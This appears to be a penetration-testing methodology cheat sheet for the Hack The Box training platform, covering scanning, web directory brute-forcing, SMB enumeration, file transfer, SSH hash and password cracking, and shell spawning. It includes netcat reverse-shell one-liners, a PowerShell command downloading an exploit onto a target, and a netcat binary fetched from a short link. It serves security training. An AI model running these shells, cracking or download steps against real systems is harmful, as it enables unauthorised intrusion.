HACK THE BOX

HackTheBox Methodology

WHAT IS HACK THE BOX ?

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

Hack The Box

Many people asked me about the methodology I use to root machines in Hack The Box, so today I will explain in detail how I play Hack The Box machine.

PREPARATION

I create a separate dirctory for every single machine, so that I can save the files, tools and scripts I used in each box sepatately and note-down the important things like password, hash, custom scripts/payloads etc.

Hack The Box Machines
HOST FILE
Hosts File
sudo echo "10.10.10.XX machinename.htb" >> /etc/hosts sudo nano /etc/hosts

Now you can use IP or URL in the commands or scripts as per your need.

Information Gathering

● NMAP :

https://nmap.org/download.html

Nmap
nmap -sS -sC -sV -p- -oN nmap-result.txt 10.10.10.XX nmap -v -sU -T5 -oN nmap-UDP-result.txt 10.10.10.XX

● MASSCAN :

https://github.com/robertdavidgraham/masscan

masscan -p1-65535,U:1-65535 10.10.10.XX

● AUTOMATE RECON / ENUM :

you can also use these script to automate the process of enumeration & recon.

AutoRecon : https://github.com/Tib3rius/AutoRecon
nmapAutomator : https://github.com/21y4d/nmapAutomator

WEB ENUMERATION / DIRECTORY AND FILES BRUTE-FORCING :

● NIKTO :

if Port 80 or 443 is Open, you can use Nikto to collect more information.

https://github.com/sullo/nikto

nikto -h https://10.10.10.XX | tee nikto.txt

● GOBUSTER :

https://github.com/OJ/gobuster

gobuster
gobuster dir -u http://10.10.10.XX/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .txt,.html,.php -u http://10.10.10.XX:80/ -o gobuster.txt

● FFUF :

https://github.com/ffuf/ffuf

ffuf -u http://10.10.10.XX:80/FUZZ/script.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee fuff.txt

● WFUZZ :

https://github.com/xmendez/wfuzz

wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -u "http://10.10.10.XX/FUZZ.txt" -t 100 | tee wfuzz.txt

Use Seclists for More Wordlists : https://github.com/danielmiessler/SecLists

SERVICE ENUMERATION

● EXPLOIT DB / SEARCHEXPLOIT :

https://exploit-db.com/searchsploit

Searchsploit
sudo apt update && sudo apt -y install exploitdb searchsploit -u searchsploit -h

● SMB ENUMERATION :

If you’re on a windows box and port 139 or 445 is open, Enumerate SMB.

SMB Client
nmblookup -A 10.10.10.XX nbtscan 10.10.10.XX smbmap -H 10.10.10.XX smbclient -L 10.10.10.XX
nmap --script smb-os-discovery 10.10.10.XX nmap -p445 -sV --script smb-enum-services 10.10.10.XX nmap --script smb-enum-shares -p 139,445 10.10.10.XX nmap --script smb-vuln* -p 139,445 10.10.10.XX
rpcclient -U "" -N 10.10.10.XX

● ENUM4LINUX :

Enumerate information from Windows and Samba systems : https://kali.org/tools/enum4linux/

Enum4Linux
enum4linux -a -o 10.10.10.XX
FILE TRANSFER IN LINUX

● PYTHON HTTP SERVER :

Python Server

sudo python -m SimpleHTTPServer 80
Wget

wget http://[IP]/file.txt

● NETCAT :

nc [IP/URL] [PORT] < filename nc -l -p [PORT] > filename

● BASE64 :

Base64
base64 file.txt echo "aHR0cHM6Ly9oYWNrdHJvbmlhbi5pbgo=" | base64 -d > newfile.txt

● SCP :

Transfer the file test.file to the other server use the following command :

scp /filename.xyz [email protected]:/path-of-file/filename.xyz
FILE TRANSFER IN WINDOWS

● HTTP SERVER :

Local System :

service apache2 start cp exploit.exe /var/www/html/

Target System :

firefox http://10.10.10.XX/filename.xyz (new-object System.Net.WebClient).DownloadFile('http://10.10.10.XX/exploit.exe','C:\Users\USERNAME\Desktop\filename.xyz')

● PSCP :

http://xray.rutgers.edu/~matilsky/documents/pscp.htm

pscp "C:\Users\USERNAME\Folder\file.txt" [email protected]:/root/hacktheboxfile.txt
Netcat
Netcat

● INSTALLATION :

sudo apt-get install netcat
wget http://bit.ly/netcat_exe -o nc.exe

● LISTEN PORT :

nc -lnvp [PORT]

● CHAT SERVER :

nc -l [PORT] nc [IP] [PORT]

Now, type anything and it will show on the listener's shell.

● FILE TRANSFER :

nc [IP/URL] [PORT] < filename nc -l -p [PORT] > filename

● REVERSE SHELL :

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.10.10.XX 1337

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.XX 1337 >/tmp/f
SSH
SSH

● INSTALLATION :

sudo apt install openssh-server

● CONNECTION :

● CREATE SSH KEYS :

ssh-keygen

● PERMISSION :

chmod 644 id_rsa.pub chmod 600 id_rsa

● SSH PASSWORD CRAKING USING KEY :

Download sshng2john.py

python /opt/JohnTheRipper/run/sshng2john.py id_rsa > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash

● CRACK SSH PASSWORD USING HYDRA :

hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.XX
IMPACKET

Impacket is a collection of Python classes for working with network protocols.

https://github.com/CoreSecurity/impacket



REVERSE SHELL

Pentestmonkey : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Reverse Shell Cheatsheet.md : https://github.com/swisskyrepo/PayloadsAllTheThings/
Reverse Shell Cheat Sheet : https://oscp.infosecsanyam.in/shells/reverse-shell-cheat-sheet

SHELL SPAWNING
python -c 'import pty; pty.spawn("/bin/bash")' echo 'os.system('/bin/bash')' /bin/sh -i /bin/bash -i exec "/bin/sh"; exec "/bin/sh" os.execute('/bin/sh') exec "/bin/sh" :!bash :set shell=/bin/bash:shell !sh

Interactive tty-shell : https://github.com/cornerpirate/socat-shell

PRIVILEGE ESCALATION

PayloadsAllTheThings : https://github.com/swisskyrepo/PayloadsAllTheThings
Evil-WinRM : https://github.com/Hackplayers/evil-winrm

● LINUX :

● WINDOWS :


Share :